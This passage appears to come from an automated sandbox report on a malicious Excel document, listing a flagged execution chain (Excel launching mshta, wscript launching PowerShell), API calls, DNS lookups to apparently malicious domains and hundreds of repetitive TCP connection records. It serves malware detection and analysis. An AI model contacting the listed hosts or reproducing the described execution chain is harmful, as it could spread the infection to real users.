                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 34_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,34_2_00406F06

                    Software Vulnerabilities

                    barindex
                    Document exploit detected (process start blacklist hit)
                    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe
                    Suspicious execution chain found
                    Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: 1017.filemail.com
                    Source: global trafficDNS query: name: 1017.filemail.com
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: provit.uk
                    Source: global trafficDNS query: name: 1017.filemail.com
                    Source: global trafficDNS query: name: 1017.filemail.com
                    Source: global trafficDNS query: name: banaya.duckdns.org
                    Source: global trafficDNS query: name: geoplugin.net
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49174 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49164 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49166 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49167 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49173 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49175 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49177 -> 178.237.33.50:80
                    Source: global trafficTCP traffic: 192.168.2.22:49178 -> 192.3.220.29:80
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49163 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49165 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49169 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49171 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49172 -> 198.244.140.41:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
                    Source: global trafficTCP traffic: 192.168.2.22:49168 -> 142.215.209.78:443
